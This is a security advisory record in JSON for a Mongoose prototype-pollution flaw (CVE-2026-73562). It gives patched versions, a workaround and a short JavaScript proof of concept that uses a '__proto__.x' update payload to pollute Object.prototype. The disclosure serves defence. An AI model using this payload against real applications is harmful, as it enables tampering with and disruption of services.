{"id":"GHSA-664h-wqgq-64gw","summary":"Mongoose: Prototype pollution in mongoose update casting via __proto__-prefixed dotted path (Schema._getSchema/path getter)","details":"### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nPrototype pollution in update casting: passing a user-controlled update to a Mongoose update, like `MyModel.updateOne(filter, req.body)`, can cause Mongoose to set `$fullPath` and `$parentSchemaDocArray` on `Object.prototype`.\n\nExample:\n\n```javascript\nconst mongoose = require('mongoose');\nconsole.log('before:', Object.prototype.$fullPath);            // undefined\n\nconst User = mongoose.model('User', new mongoose.Schema({ name: String }));\nconst malicious = JSON.parse('{\"$set\": {\"__proto__.x\": \"anything\"}}');   // attacker-controlled update\n\nconst q = User.updateOne({}, {});\ntry { q._castUpdate(malicious); } catch (e) { /* throws AFTER the pollution side-effect */ }\n\nconsole.log('after :', Object.prototype.$fullPath);            // \"__proto__\"\nconsole.log('enumerable:', Object.prototype.propertyIsEnumerable('$fullPath'));  // true\nconsole.log('fresh {}:', ({}).$fullPath);                      // \"__proto__\"\n```\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n9.7.2, 8.24.1. 7.8.10, 6.13.10\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nCheck user-controlled updates for own `__proto__` properties before passing to Mongoose\n\n### References\n_Are there any links users can visit to find out more?_","aliases":["BIT-mongoose-2026-73562","CVE-2026-73562"],"modified":"2026-08-19T09:55:54.203227351Z","published":"2026-07-24T16:22:34Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-1321"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2026-07-24T16:22:34Z"},"references":[{"type":"WEB","url":"https://github.com/Automattic/mongoose/security/advisories/GHSA-664h-wqgq-64gw"},{"type":"WEB","url":"https://github.com/Automattic/mongoose/pull/16230"},{"type":"WEB","url":"https://github.com/Automattic/mongoose/commit/f494b8430f9097fc70446d6949c8a42a27518e0b"},{"type":"PACKAGE","url":"https://github.com/Automattic/mongoose"},{"type":"WEB","url":"https://github.com/Automattic/mongoose/releases/tag/6.13.10"},{"type":"WEB","url":"https://github.com/Automattic/mongoose/releases/tag/7.8.10"},{"type":"WEB","url":"https://github.com/Automattic/mongoose/releases/tag/8.24.1"},{"type":"WEB","url":"https://github.com/Automattic/mongoose/releases/tag/9.7.2"}],"affected":[{"package":{"name":"mongoose","ecosystem":"npm","purl":"pkg:npm/mongoose"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"6.13.10"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-664h-wqgq-64gw/GHSA-664h-wqgq-64gw.json"}},{"package":{"name":"mongoose","ecosystem":"npm","purl":"pkg:npm/mongoose"},"ranges":[{"type":"SEMVER","events":[{"introduced":"7.0.0"},{"fixed":"7.8.10"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-664h-wqgq-64gw/GHSA-664h-wqgq-64gw.json"}},{"package":{"name":"mongoose","ecosystem":"npm","purl":"pkg:npm/mongoose"},"ranges":[{"type":"SEMVER","events":[{"introduced":"8.0.0"},{"fixed":"8.24.1"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-664h-wqgq-64gw/GHSA-664h-wqgq-64gw.json"}},{"package":{"name":"mongoose","ecosystem":"npm","purl":"pkg:npm/mongoose"},"ranges":[{"type":"SEMVER","events":[{"introduced":"9.0.0"},{"fixed":"9.7.2"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-664h-wqgq-64gw/GHSA-664h-wqgq-64gw.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"}]}